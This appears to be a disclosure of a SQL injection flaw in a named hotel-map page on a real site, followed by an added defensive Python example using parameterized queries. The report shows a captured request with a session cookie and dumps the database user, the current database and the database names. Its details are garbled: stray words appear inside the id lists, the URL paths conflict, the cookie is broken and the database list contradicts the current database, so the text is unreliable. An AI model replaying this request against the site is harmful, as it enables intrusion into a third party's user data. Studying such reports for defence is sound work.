The SQL injection vulnerability on a website affects the user database again.
Location: http://hotels.yonyou.com/hotelmaplist/index.html?Cityid=0101&h=340&ids=17996,129696,clerk,126559,124890,clerk,clerk,128908,145772,146286,146180,17995&juli=&px=3&w=760
Parameters: cityid, ids
Taking cityid as an example, the request has to be captured and run from the capture:
GET /javasmaplist/index.html?Cityid=0101&h=340&ids=17996,129696,expires,126559,124890,expires,expires,128908,145772,146286,146180,17995&juli=&px=3&w=760 HTTP/1.1
Host: hotels.yonyou.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: signature=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%signature%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22192.168.0.125%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A72%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A37.0%29+Gecko%2F20100101+Firefox%2F37.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1429668080%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%timeout
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Back-end DBMS: Microsoft SQL Server 2008
Current user: 'user_r_tianqiA'
Current database: 'Hotel_9tour_cn'
Available databases [7]:
[*] Pai_9tour_cn
[*] Pai_9tour_cn\x03
[*] Master
[*] Model
[*] Msdb
[*] Tempdb
[*] Www_mapdata_com
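
Added example, not code from the reported site: one way to handle the two reported parameters (cityid, and ids as a comma-separated list) so that no request text reaches the SQL string. The table and column names, the length limits and the in-memory SQLite database standing in for SQL Server are assumptions made for the illustration.

```python
import re
import sqlite3

CITYID_RE = re.compile(r"[0-9]{1,8}")  # assumed format: short numeric code such as 0101
MAX_IDS = 50                           # assumed upper bound on the ids list


def parse_params(cityid, ids):
    """Validate both parameters; raise ValueError on anything unexpected."""
    if not CITYID_RE.fullmatch(cityid):
        raise ValueError("cityid must be numeric")
    parts = [p.strip() for p in ids.split(",")]
    if not 1 <= len(parts) <= MAX_IDS:
        raise ValueError("ids has too few or too many entries")
    if not all(p.isascii() and p.isdigit() and len(p) <= 9 for p in parts):
        raise ValueError("ids must be a comma-separated list of integers")
    return cityid, [int(p) for p in parts]


def hotels_for_map(conn, cityid, ids):
    """Query with bound parameters only; the request values never enter the SQL text."""
    cityid, id_list = parse_params(cityid, ids)
    placeholders = ",".join("?" * len(id_list))  # only '?' marks are interpolated
    sql = ("SELECT id, name FROM hotel "
           f"WHERE city_id = ? AND id IN ({placeholders}) ORDER BY id")
    return conn.execute(sql, [cityid, *id_list]).fetchall()


def demo_db():
    """Constructed sample rows standing in for the real hotel table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE hotel (id INTEGER PRIMARY KEY, name TEXT, city_id TEXT)")
    conn.executemany("INSERT INTO hotel VALUES (?, ?, ?)",
                     [(17996, "Hotel A", "0101"), (129696, "Hotel B", "0101"),
                      (17995, "Hotel C", "0102")])
    return conn


if __name__ == "__main__":
    db = demo_db()
    print(hotels_for_map(db, "0101", "17996,129696,17995"))
    for bad in (("0101'", "17996"), ("0101", "17996,abc")):
        try:
            hotels_for_map(db, *bad)
        except ValueError as exc:
            print("rejected:", exc)
```

The output above also shows system databases being listed with the application's login, so running the site under a database account limited to its own schema would reduce what a flaw like this exposes.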